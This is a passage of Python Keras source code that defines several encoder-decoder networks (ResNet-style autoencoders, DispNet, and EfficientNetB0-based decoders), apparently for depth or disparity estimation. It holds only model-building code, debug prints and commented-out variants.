X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def ResNet_autoencoder(self, height, width, depth, latentDim=64):
X_input = Input(shape=(height, width, depth))
X = X_input
# encoder Stage 1
X = Conv2D(32, (3, 3), strides=(2, 2), name='conv1-1',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv1-1')(X)
X = Activation('relu')(X)
X = Conv2D(32, (1, 1), strides=(1, 1), name='conv1-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv1-2')(X)
skip_connect_1 = X
X = Activation('relu')(X)
# encoder Stage 2
X = Conv2D(64, (3, 3), strides=(2, 2), name='conv2-1',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv2-1')(X)
X = Activation('relu')(X)
X = Conv2D(64, (1, 1), strides=(1, 1), name='conv2-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv2-2')(X)
skip_connect_2 = X
X = Activation('relu')(X)
# encoder Stage 3
X, _ = self.convolutional_block(
X, f=3, filters=[64, 64, 128], stage=3, block='a', s=2)
X, skip_connect_3 = self.identity_block(
X, 3, [64, 64, 128], stage=3, block='b')
# encoder Stage 4
X, _ = self.convolutional_block(
X, f=3, filters=[128, 128, 256], stage=4, block='a', s=2)
X, skip_connect_4 = self.identity_block(
X, 3, [128, 128, 256], stage=4, block='b')
# encoder Stage 5
X, _ = self.convolutional_block(
X, f=3, filters=[256, 256, 512], stage=5, block='a', s=2)
X, skip_connect_5 = self.identity_block(
X, 3, [256, 256, 512], stage=5, block='b')
# latent-space representation
volumeSize = K.int_shape(X)
X = Flatten()(X)
latent = Dense(latentDim)(X)
# encoder = Model(X_input, latent, name="encoder")
# latentInputs = Input(shape=(latentDim,))
X = Dense(np.prod(volumeSize[1:]))(latent)
X = Reshape((volumeSize[1], volumeSize[2], volumeSize[3]))(X)
# # # decoder Stage 1
X = Concatenate()([X, skip_connect_5])
X, _ = self.identity_block_transpose(
X, 3, [1024, 1024, 1024], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_connect_4])
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_connect_3])
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # # decoder Stage 4
X = Concatenate()([X, skip_connect_2])
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 5
X = Concatenate()([X, skip_connect_1])
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
autoencoder = Model(inputs=X_input, outputs=outputs,
name='ResNet_autoencoder')
# print(autoencoder.summary())
return autoencoder
def DispNet_encoder(self, height, width, depth):
# Conv 1 (batch, 192, 384, 64)
inputs = Input(shape=(height, width, depth))
print("in ----- ",inputs.shape)
conv_1 = Conv2D(64, kernel_size=(7, 7), strides=(2, 2), padding='same')(inputs)
conv_1 = Activation('relu')(conv_1)
print("in_1----- ",conv_1.shape)
# self.conv_1 = conv_1
# Conv 2 (batch, 96, 192, 128)
conv_2 = Conv2D(128, kernel_size=(5, 5), strides=(2, 2), padding='same')(conv_1)
conv_2 = Activation('relu')(conv_2)
print("in_2----- ",conv_2.shape)
# self.conv_2 = conv_2
# Conv 3a (batch, 48, 96, 256)
conv_3a = Conv2D(256, kernel_size=(5, 5), strides=(2, 2), padding='same')(conv_2)
conv_3a = Activation('relu')(conv_3a)
# Conv 3b (batch, 48, 96, 256)
conv_3b = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_3a)
conv_3b = Activation('relu')(conv_3b)
print("in_3----- ",conv_3b.shape)
# self.conv_3b = conv_3b
# Conv 4a (batch, 24, 48, 512)
conv_4a = Conv2D(512, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_3b)
conv_4a = Activation('relu')(conv_4a)
# Conv 4b (batch, 24, 48, 512)
conv_4b = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_4a)
conv_4b = Activation('relu')(conv_4b)
print("in_4----- ",conv_4b.shape)
# self.conv_4b = conv_4b
# Conv 5a (batch, 12, 24, 512)
conv_5a = Conv2D(512, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_4b)
conv_5a = Activation('relu')(conv_5a)
# Conv 5b (batch, 12, 24, 512)
conv_5b = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_5a)
conv_5b = Activation('relu')(conv_5b)
print("in_5----- ",conv_5b.shape)
# self.conv_5b = conv_5b
# Conv 6a (batch, 6, 12, 1024)
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_5b)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
print("in_6----- ",conv_6b.shape)
# self.conv_6b = conv_6b
# Prediction_Loss 6 (batch, 6, 12, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('relu', name='6x12')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
encoder = Model(inputs=inputs, outputs=[conv_1, conv_2, conv_3b, conv_4b, conv_5b, conv_6b, pre_1],
name='DispNet_encoder')
# print(encoder.summary())
return conv_1, conv_2, conv_3b, conv_4b, conv_5b, conv_6b, pre_1
def DispNet_decoder(self, conv_1, conv_2, conv_3b, conv_4b, conv_5b, inputs):
# Upconv 6 (batch, 12, 24, 512)
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(inputs)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, conv_5b])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('relu', name='12x24')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, conv_4b])
iconv_4 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('relu', name='24x48')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, conv_3b])
iconv_3 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('relu', name='48x96')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, conv_2])
iconv_2 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('relu', name='96x192')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
c = Concatenate(axis=-1)([upconv_1, conv_1])
iconv_1 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('relu', name='192x384')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_0 = Conv2DTranspose(16, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 1 (batch, 192, 384, 32)
iconv_0 = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('relu', name='192x384')(prediction)
print("0---- ",prediction.shape)
pre_final = prediction
decoder = Model(inputs=[conv_1, conv_2, conv_3b, conv_4b, conv_5b, inputs], outputs=[pre_2, pre_3, pre_4, pre_5, pre_6, pre_final], name='DispNet_decoder')
print(decoder.summary())
return pre_2, pre_3, pre_4, pre_5, pre_6, pre_final
def DispResNet_autoencoder(self, height, width, depth):
# Conv 1 (batch, 192, 384, 64)
inputs = Input(shape=(height, width, depth))
print("in ----- ",inputs.shape)
conv_1 = Conv2D(64, kernel_size=(7, 7), strides=(2, 2), padding='same')(inputs)
conv_1 = Activation('relu')(conv_1)
print("in_1----- ",conv_1.shape)
# self.conv_1 = conv_1
# Conv 2 (batch, 96, 192, 128)
# encoder Stage 2
conv_2a, _ = self.convolutional_block(conv_1, f=3, filters=[64, 64, 128], stage=2, block='a', s=2)
conv_2b, skip_connect_3 = self.identity_block(conv_2a, 3, [64, 64, 128], stage=2, block='b')
print("in_2----- ",conv_2b.shape)
# encoder Stage 3
conv_3a, _ = self.convolutional_block(conv_2b, f=3, filters=[128, 128, 256], stage=3, block='a', s=2)
conv_3b, _ = self.identity_block(conv_3a, 3, [128, 128, 256], stage=3, block='b')
print("in_3----- ",conv_3b.shape)
# encoder Stage 4
conv_4a, _ = self.convolutional_block(conv_3b, f=3, filters=[256, 256, 512], stage=4, block='a', s=2)
conv_4b, _ = self.identity_block(conv_4a, 3, [256, 256, 512], stage=4, block='b')
print("in_4----- ",conv_4b.shape)
# encoder Stage 5
conv_5a, _ = self.convolutional_block(conv_4b, f=3, filters=[256, 256, 512], stage=5, block='a', s=2)
conv_5b, _ = self.identity_block(conv_5a, 3, [256, 256, 512], stage=5, block='b')
print("in_5----- ",conv_5b.shape)
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_5b)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
print("in_6----- ",conv_6b.shape)
# self.conv_6b = conv_6b
# Prediction_Loss 6 (batch, 6, 12, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('relu')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(conv_6b)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
upconv_5 = Cropping2D(cropping=((1, 0), (1, 0)), data_format=None)(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, conv_5b])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('relu')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, conv_4b])
iconv_4 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('relu', name='24x48')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
# upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, conv_3b])
iconv_3 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('relu', name='48x96')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, conv_2b])
iconv_2 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('relu', name='96x192')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
upconv_1 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_1)
c = Concatenate(axis=-1)([upconv_1, conv_1])
iconv_1 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('relu', name='192x384')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_0 = Conv2DTranspose(16, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 1 (batch, 192, 384, 32)
iconv_0 = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('relu', name='final_layer')(prediction)
print("0---- ",prediction.shape)
pre_final = prediction
Disp_ResNet_autoencoder = Model(inputs=inputs, outputs=[pre_5, pre_6 , pre_final], name='Disp_ResNet_autoencoder')
# print(DispNet_autoencoder.summary())
return Disp_ResNet_autoencoder
def res_50_disp_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(X)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('sigmoid')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
print("6---- ",prediction.shape)
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(conv_6b)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
upconv_5 = Cropping2D(cropping=((1, 0), (1, 0)), data_format=None)(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, skip_5])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('sigmoid')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, skip_4])
iconv_4 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('sigmoid')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
# upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, skip_3])
iconv_3 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('sigmoid')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, skip_2])
iconv_2 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('sigmoid')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
upconv_1 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_1)
c = Concatenate(axis=-1)([upconv_1, skip_1])
iconv_1 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('sigmoid')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_0 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 1 (batch, 192, 384, 32)
iconv_0 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('sigmoid', name='final_layer')(prediction)
print("0---- ",prediction.shape)
pre_final = prediction
new_model = Model(inputs=model.inputs, outputs= [pre_5, pre_6 , pre_final], name='Disp_ResNet_autoencoder')
# print(new_model.summary())
return new_model
def ResNet_block_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # # decoder Stage 4
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 5
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
new_model = Model(inputs=model.inputs, outputs=outputs,
name='ResNet_block_autoencoder')
# print(autoencoder.summary())
return new_model
def ResNet_resblock_disp_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
